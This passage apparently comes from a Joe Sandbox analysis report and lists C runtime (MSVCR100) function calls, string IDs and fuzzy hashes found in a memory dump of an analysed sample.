                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139757366-0
                                                                                                          • Opcode ID: f23ba559aa893185abb7e34c1d0a08097b25cd20fc50bfde09bae01490b03719
                                                                                                          • Instruction ID: 2190742f92695febcd525cd56828dd7e02dd9162110ce8c8c26b308d7bbacf33
                                                                                                          • Opcode Fuzzy Hash: f23ba559aa893185abb7e34c1d0a08097b25cd20fc50bfde09bae01490b03719
                                                                                                          • Instruction Fuzzy Hash: 98F06D71802705EAE790AB74D804B5E77B06F01338F1197059474AA0C0CB7CB6028BB8
                                                                                                          APIs
                                                                                                          • TlsAlloc.KERNEL32 ref: 6FDC0093
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC00A3
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC00BC
                                                                                                          • _CxxThrowException.MSVCR100(00000000,6FE20C48,00000000), ref: 6FDC00CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@AllocConcurrency@@ErrorExceptionLastThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2232697313-0
                                                                                                          • Opcode ID: e1c1801e7163632e468443e9efe11cc28507f1ae510ba029fca2bf30d3040291
                                                                                                          • Instruction ID: 92cb24debae302357bd080b3dd8a8c8158ccdc4bacec909de0bdb738e9bfe2ef
                                                                                                          • Opcode Fuzzy Hash: e1c1801e7163632e468443e9efe11cc28507f1ae510ba029fca2bf30d3040291
                                                                                                          • Instruction Fuzzy Hash: 3DF0E9B141470146C7406B748C1A62A3698AF42334F104739E429C60C0FF34F110BAA7
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6ED8,0000000C), ref: 6FDD6E7C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6ED8,0000000C), ref: 6FDD6E87
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD6ED8,0000000C), ref: 6FDD6E96
                                                                                                          • _ungetwc_nolock.MSVCR100(?,?,6FDD6ED8,0000000C), ref: 6FDD6EA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetwc_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1885232967-0
                                                                                                          • Opcode ID: 310cc4e5f4363a468146f64a2abce53db84e6525c873bae9cc0cf25d642b3b97
                                                                                                          • Instruction ID: 5f236c59a05e43a42164d6320e40fffaa0dbddc316b5e2199bc9951c7f75a212
                                                                                                          • Opcode Fuzzy Hash: 310cc4e5f4363a468146f64a2abce53db84e6525c873bae9cc0cf25d642b3b97
                                                                                                          • Instruction Fuzzy Hash: 7DF01235405306EAEB906FB5EC056AD37B0AF05369F11D166B4249E1D0DB3AA5419B60
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 972587971-0
                                                                                                          • Opcode ID: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                          • Instruction ID: 15dc96225fee76723829375832c52ce7fabbb4067b99d4ddb5ff7bcb42a9bf30
                                                                                                          • Opcode Fuzzy Hash: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                          • Instruction Fuzzy Hash: E1E09231655319EBDB916F68EC00A9A37649F05B58F014261F864AB290EB71F85087E4
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47A9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47B4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47C3
                                                                                                          • _ftelli64_nolock.MSVCR100(00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_ftelli64_nolock_invalid_parameter_invalid_parameter_noinfo_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2490801915-0
                                                                                                          • Opcode ID: 086ded24fbb19c07a5641324c69387abb37882972d8de68de7059722c1237e59
                                                                                                          • Instruction ID: 67680b35a99f8294c2975ad714cef269c53e7220495db4fe47b5aea9c995c6ed
                                                                                                          • Opcode Fuzzy Hash: 086ded24fbb19c07a5641324c69387abb37882972d8de68de7059722c1237e59
                                                                                                          • Instruction Fuzzy Hash: 3DF0FE31901349EBDF80AFB9ED0568D77B1BF46369F20C225F424AA1D0DB78A5819BA0
                                                                                                          APIs
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6FDC236A
                                                                                                            • Part of subcall function 6FDC20F1: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6FDC1F83,?,6FDC1F83,00000001), ref: 6FDC2110
                                                                                                            • Part of subcall function 6FDC20F1: _CxxThrowException.MSVCR100(?,6FE20DAC,6FDC1F83), ref: 6FDC2125
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000008,00000002), ref: 6FDC2382
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20DC8,?,00000008,00000002), ref: 6FDC2397
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6FDC23A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Policy$??0exception@std@@Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@
                                                                                                          • String ID:
                                                                                                          • API String ID: 522757350-0
                                                                                                          • Opcode ID: 9d19679e89e2b8d5ce3b4dec549e305b8b8aa280d8682464fb9d4d6568f12ce9
                                                                                                          • Instruction ID: 8422a0ea0d91821904fb610aeea60d6a2b1e165d907656bd1c93e11280531011
                                                                                                          • Opcode Fuzzy Hash: 9d19679e89e2b8d5ce3b4dec549e305b8b8aa280d8682464fb9d4d6568f12ce9
                                                                                                          • Instruction Fuzzy Hash: 48F05E31540308ABC780EFA8C881E8D7BAC6F4574CF008059ED06AB280EF30F645DBA2
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD3DF0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD3DFA
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _fsopen.MSVCR100(?,?,00000080), ref: 6FDD3E0E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fsopen_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625326935-0
                                                                                                          • Opcode ID: 6b0c4313ef2805752d118dca9e261a7ed14f5036beb5d380c3d578ada8b764d7
                                                                                                          • Instruction ID: 43341494eeecf0d7a919971a1b3d3d308f56b478852814b552b6221be0744c61
                                                                                                          • Opcode Fuzzy Hash: 6b0c4313ef2805752d118dca9e261a7ed14f5036beb5d380c3d578ada8b764d7
                                                                                                          • Instruction Fuzzy Hash: 4CE0D836681329EBC7A12F6CDC02E8A3764AF497A4F054221F8949F2D0DB72F84047F0
                                                                                                          APIs
                                                                                                          • SetThreadPriority.KERNEL32(?,?), ref: 6FDC6F32
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC6F3C
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC6F54
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC6F62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@ErrorExceptionLastPriorityThreadThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2064810379-0
                                                                                                          • Opcode ID: 8ebd303bc21588e418c8aaff75088ecb4ec5082bad789d48595fefb712dfd2d0
                                                                                                          • Instruction ID: d7d09917be5023dae0b3550a886cc76070b07e60bd44d8c895e2df4c1b0d99cb
                                                                                                          • Opcode Fuzzy Hash: 8ebd303bc21588e418c8aaff75088ecb4ec5082bad789d48595fefb712dfd2d0
                                                                                                          • Instruction Fuzzy Hash: F7F0E57150430ADFEB54DFA4C805E7E3BACBF01320B144629E419DB2A1EB34F910CA91
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6DF3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6DFE
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6E0B
                                                                                                          • _ungetc_nolock.MSVCR100(?,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6E1B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetc_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3962069902-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFAD6C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFAD77
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDFAD81
                                                                                                          • _wmktemp_s.MSVCR100(?,00000001,?), ref: 6FDFAD89
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_wmktemp_swcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1562557449-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFABD1
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFABDC
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strlen.MSVCR100(?), ref: 6FDFABE6
                                                                                                          • _mktemp_s.MSVCR100(?,00000001,?), ref: 6FDFABEE
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_mktemp_sstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3626312056-0
                                                                                                          APIs
                                                                                                          • TlsAlloc.KERNEL32(?,?,?,6FDC00D5), ref: 6FDCA0F8
                                                                                                          • GetLastError.KERNEL32(?,?,?,6FDC00D5), ref: 6FDCA108
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,?,6FDC00D5), ref: 6FDCA120
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,?,6FDC00D5), ref: 6FDCA12E
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@AllocConcurrency@@ErrorExceptionLastThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2232697313-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE007D7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE007DE
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: I10__errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                                                                                          • String ID: -
                                                                                                          • API String ID: 4208928170-2547889144
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE0019D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE001A4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: I10__errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                                                                                          • String ID: -
                                                                                                          • API String ID: 4208928170-2547889144
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDB614A: TlsGetValue.KERNEL32(?,6FDC5442,00000004,6FDC5D63,?,?,00000000,?,?,?,6FDC5C6B,00000001), ref: 6FDB615F
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDBAFC4
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20CE0,?), ref: 6FDBAFD9
                                                                                                            • Part of subcall function 6FD986E8: RaiseException.KERNEL32(?,?,6FDAF30F,?,?,?,?,?,6FDAF30F,?,6FD8C888,6FE28518), ref: 6FD98727
                                                                                                          Strings
                                                                                                          • Lock already taken as a writer, xrefs: 6FDBAFBD
                                                                                                          Similarity
                                                                                                          • API ID: Exception$??0exception@std@@Copy_str@exception@std@@RaiseThrowValue
                                                                                                          • String ID: Lock already taken as a writer
                                                                                                          • API String ID: 3544620089-3737755527
                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,6FE27C68,00000104,?,?,?,?,?,?,6FDA7432), ref: 6FDCBE76
                                                                                                          • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6FDA7432), ref: 6FDCBEC4
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleName_malloc_crt
                                                                                                          • String ID: h|o
                                                                                                          • API String ID: 2373854079-2772395301
                                                                                                          APIs
                                                                                                          • _calloc_crt.MSVCR100(00000004), ref: 6FD8C4BC
                                                                                                          • _calloc_crt.MSVCR100(00000014,00000004), ref: 6FDA8875
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _calloc_crt
                                                                                                          • String ID: x0o
                                                                                                          • API String ID: 2398442801-1005245174
                                                                                                          APIs
                                                                                                          • _flsbuf.MSVCR100(00000000,?), ref: 6FDD6471
                                                                                                            • Part of subcall function 6FD8ED1C: _fileno.MSVCR100(6FD908FE,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED27
                                                                                                            • Part of subcall function 6FD8ED1C: _write.MSVCR100(6FD908FE,FFFF9B4B,00000000,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED95
                                                                                                          • _flsbuf.MSVCR100(00000000,?), ref: 6FDD6489
                                                                                                            • Part of subcall function 6FD8ED1C: _lseeki64.MSVCR100(6FD908FE,00000000,00000000,00000002,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA8928
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _flsbuf$_fileno_lseeki64_write
                                                                                                          • String ID: B
                                                                                                          • API String ID: 3565827689-1255198513
                                                                                                          APIs
                                                                                                          • __BuildCatchObject.MSVCR100(00000000,csm,6FDB2708,00000000,csm,6FDF461A,?,6FDB2708), ref: 6FDF44D7
                                                                                                            • Part of subcall function 6FDF4414: __BuildCatchObjectHelper.MSVCR100(?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF444A
                                                                                                            • Part of subcall function 6FDF4414: __AdjustPointer.MSVCR100(?,00000008,00000001), ref: 6FDF4461
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObject$AdjustHelperPointer
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 1575089355-3733052814
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD5F68
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD5F73
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: I
                                                                                                          • API String ID: 340685940-3707901625
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD5E4C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD5E57
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: I
                                                                                                          • API String ID: 340685940-3707901625
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(00000000,00000001,?,?,?,?,00000010), ref: 6FD8BF94
                                                                                                            • Part of subcall function 6FD8BE96: _malloc_crt.MSVCR100(00000054), ref: 6FD8BEFA
                                                                                                          • ??1exception@std@@UAE@XZ.MSVCR100 ref: 6FD8BFC5
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??1exception@std@@_malloc_crt
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 2462871298-2104205924
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6FDBC51C), ref: 6FDBC4E0
                                                                                                          • _CxxThrowException.MSVCR100(00010000,6FE20C0C,6FDBC51C), ref: 6FDBC4F5
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@ExceptionThrow
                                                                                                          • String ID: version
                                                                                                          • API String ID: 2684170311-3206337475
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDA889B
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterSection$_lock
                                                                                                          • String ID: h2o
                                                                                                          • API String ID: 1875928789-1123844877
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(7FFFFFFF,00000001), ref: 6FDC4A34
                                                                                                          • _CxxThrowException.MSVCR100(?,6FD8C888,7FFFFFFF,00000001), ref: 6FDC4A49
                                                                                                            • Part of subcall function 6FD986E8: RaiseException.KERNEL32(?,?,6FDAF30F,?,?,?,?,?,6FDAF30F,?,6FD8C888,6FE28518), ref: 6FD98727
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Exception$??0exception@std@@RaiseThrow
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 2887422211-2104205924
                                                                                                          APIs
                                                                                                          • _unlock.MSVCR100(?,?,6FDD6E42,00000040,6FDD6E31,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A485
                                                                                                            • Part of subcall function 6FD80934: LeaveCriticalSection.KERNEL32(?,6FD8A96B,0000000A,6FD8A9B4,?,6FD81EE5,0000000D), ref: 6FD80943
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,6FDD6E42,00000040,6FDD6E31,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDA88B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection$_unlock
                                                                                                          • String ID: h2o
                                                                                                          • API String ID: 203654640-1123844877
                                                                                                          • Opcode ID: f402037b3d15818d747e89c1f4e1d09a7acf206a4da08579afc6985d94d33666
                                                                                                          • Instruction ID: bcb1c81838c736ef2984c4ffa4df8cb40032f1307faa0de3c0c7b6a2d3b561d9
                                                                                                          • Opcode Fuzzy Hash: f402037b3d15818d747e89c1f4e1d09a7acf206a4da08579afc6985d94d33666
                                                                                                          • Instruction Fuzzy Hash: 30E0C273514345ABAB1807B9E88E95C3BDDAA844313294656F81CCB1C1DE22F4408C59
                                                                                                          APIs
                                                                                                          • TlsFree.KERNEL32(?,?,6FDCAB67,6FDC0EE0,?), ref: 6FDC00FF
                                                                                                          • TlsFree.KERNEL32(?,6FDCAB67,6FDC0EE0,?), ref: 6FDC010E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free
                                                                                                          • String ID: \so
                                                                                                          • API String ID: 3978063606-3095705423
                                                                                                          • Opcode ID: 45e4cd27f98a2f76969d0a87c067f73a4d27df955423ad7e8c64a2ff1cd4bd22
                                                                                                          • Instruction ID: 5e09c5c3b483353612d1dcf9935f5119180ec5356e382ff7d657f5d59fc4c82e
                                                                                                          • Opcode Fuzzy Hash: 45e4cd27f98a2f76969d0a87c067f73a4d27df955423ad7e8c64a2ff1cd4bd22
                                                                                                          • Instruction Fuzzy Hash: 67E0DF3210A6118BEB8207288C087157FA1DBC7337F240307E02CC70F0EE286826CF85
                                                                                                          APIs
                                                                                                          • memcpy.MSVCR100(?,?,6FE167FA,?,?,?), ref: 6FE16570
                                                                                                          • memmove.MSVCR100(?,6FE16816,?,?,?,6FE167FA,?,?,?), ref: 6FE16585
                                                                                                          • memcpy.MSVCR100(?,?,6FE167FA,?,6FE16816,?,?,?,6FE167FA,?,?,?), ref: 6FE16595
                                                                                                          • memmove.MSVCR100(?,?,00000046,?,?), ref: 6FE165E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
